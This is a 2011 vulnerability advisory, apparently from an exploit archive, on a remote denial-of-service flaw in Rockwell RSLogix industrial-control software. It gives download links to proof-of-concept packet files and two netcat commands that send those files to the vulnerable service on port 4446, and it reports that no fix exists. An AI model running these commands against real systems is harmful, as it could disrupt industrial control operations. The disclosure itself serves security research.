[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Rockwell RSLogix <= 19 Denial of Service
# Published : 2011-09-14
# Author :
# Previous Title : World Of Warcraft Local Stack Overflow Dos Exploit (chat-cache.txt)
# Next Title : Microsoft WINS Service <= 5.2.3790.4520 Memory Corruption
#######################################################################
Luigi Auriemma
Application: Rockwell RSLogix
http://www.rockwellautomation.com/rockwellsoftware/design/rslogix5000/
Versions: <= 19 (RsvcHost.exe 2.30.0.23)
Platforms: Windows
Bug: Denial of Service
Exploitation: remote
Date: 13 Sep 2011
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's website:
"With RSLogix 5000 programming software, you need only one software
package for discrete, process, batch, motion, safety and drive-based
application."
#######################################################################
======
2) Bug
======
RsvcHost.exe and RNADiagReceiver.exe listen on ports 4446 and others.
These services use RnaUtility.dll which doesn't handle the 32bit size
field located in the "rna" packets with results like a memset zero
overflow and invalid read access.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/poc/rslogix_1.zip
http://www.exploit-db.com/sploits/17843.zip
nc SERVER 4446 < rslogix_1a.dat
nc SERVER 4446 < rslogix_1b.dat
#######################################################################
======
4) Fix
======
No fix.
#######################################################################